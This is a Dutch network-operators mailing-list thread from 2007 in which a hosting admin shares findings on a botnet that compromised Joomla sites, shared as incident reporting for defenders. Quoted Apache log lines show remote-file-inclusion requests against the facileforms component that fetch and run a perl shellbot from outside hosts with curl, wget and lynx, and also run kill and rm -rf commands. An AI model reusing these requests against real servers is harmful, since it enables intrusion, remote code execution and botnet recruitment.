[Nlnog] (Nog een) Botnet

[ProServe - Peter Batenburg]

Inmiddels weer wat meer info van een klant, het lijkt er op dat er meer 
modules worden misbruikt van Joomla!:

200.215.129.17 - - [22/May/2007:08:03:59 +0200] "GET 
/components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=kill%20-9%20-1%00 
HTTP/1.0" 200 8557 "-" "DataCha0s/2.0"
200.215.129.17 - - [22/May/2007:08:10:41 +0200] "GET 
/components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=cd%20/tmp;curl%20-o%20shellbot.txt%20http://www.fotospaya.com/.../shellbot.txt;perl%20shellbot.txt%00 
HTTP/1.0"
200.215.129.17 - - [22/May/2007:08:15:15 +0200] "GET 
/components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=cd%20/tmp;wget%20http://www.fotospaya.com/.../shellbot.txt;perl%20shellbot.txt%00 
HTTP/1.0" 200 7036 "-" "DataCha0s/2.0"
200.215.129.17 - - [22/May/2007:08:20:05 +0200] "GET 
/components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=GET%20http://www.fotospaya.com/.../shellbot.txt|perl%00 
HTTP/1.0" 200 7014 "-" "DataCha0s/2.0"
200.215.129.17 - - [22/May/2007:08:24:04 +0200] "GET 
/components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=lynx%20-source%20www.fotospaya.com/.../shellbot.txt|perl%00 
HTTP/1.0" 200 7016 "-" "DataCha0s/2.0"
200.215.129.17 - - [22/May/2007:04:02:07 +0200] "GET 
/components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=cd%20/tmp;curl%20-o%20shellbot.txt%20http://r3dlabel.googlepages.com/shellbot.txt;perl%20shellbot.txt%00 
HTTP/1.0" 200 7016 "-" "DataCha0s/2.0"
200.215.129.17 - - [22/May/2007:04:08:02 +0200] "GET 
/components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=rm%20-rf%20/tmp/*shell*%00 
HTTP/1.0" 200 8575 "-" "DataCha0s/2.0"

Doe er je voordeel mee.

On Tue, 22 May 2007, ProServe - Peter Batenburg wrote:

> Nou, het is echt feest deze week. Hier is de volgende lijst, alleen nu iets 
> groter:
> http://www.proserve.nl/~peter/botnet7.txt
> Zelfde verhaal qua processes als vorige keer, alleen nu weten we ook via welk 
> script de machines gehacked zijn. Zoek naar rs_gallery plugin van Joomla!
>
> Stuur deze lijst naar zo veel mogelijk mensen door, ik zie weer veel dezelfde 
> hosts verschijnen helaas :(
>
> On Sat, 19 May 2007, ProServe - Peter Batenburg wrote:
>
>> Hoi,
>> 
>> Wederom ben ik een botnet tegen gekomen dmv het tracen op een gehackte 
>> dedicated server bij ons.
>> Moet zeggen dat ik verrassend veel .nl machines tegen kom:
>> http://www.proserve.nl/~peter/botnet6.txt
>> Veel hosting toko's, dus vandaar dit mailtje.
>> Omdat de IPs schijnbaar versleuteld zijn in de hostname, geeft de uname in 
>> de userinfo nog het beste beeld.
>> Het is een flink netje, met ook flink wat power zo te zien.
>> In iedergeval, deze ircd draait op 217.160.203.83 poort 23.
>> Zojuist heeft de eigenaar de ircd gekilled lijkt het, dus ik ben benieuwd 
>> hoe het met de drones is afgelopen.
>> 
>> 
>> Dit process viel op, en deze bleef ook draaien na een stop van apache.
>> apache   23570 79.8  0.3  5108 3112 ?        R    06:25 345:14 
>> /usr/sbin/httpd
>> 
>> Met een lsof was het duidelijk:
>> perl      26331   apache  206u     IPv4   15938897                 TCP 
>> x.x.nl:55480->alb-server.de:telnet (SYN_SENT)
>> 
>> Helaas heb ik het process zelf niet gevonden in de standraard temp dirs, en 
>> ook heb ik nog niet kunnen vinden welke site hiervoor misbruikt is.
>> Mochten mensen iets vinden, hoor ik het graag.
>> 
>> Deze lijst mag gedistribueerd worden, overal waar jullie het handig vinden.
>> 
>> 
>
>

-- 
  /-    Met vriendelijke groet/With kind regards,    -\
<- Peter Batenburg - ProServe B.V. - www.proserve.nl ->
  \-    tel: +31-78-6922222 - fax: +31-78-6922269    -/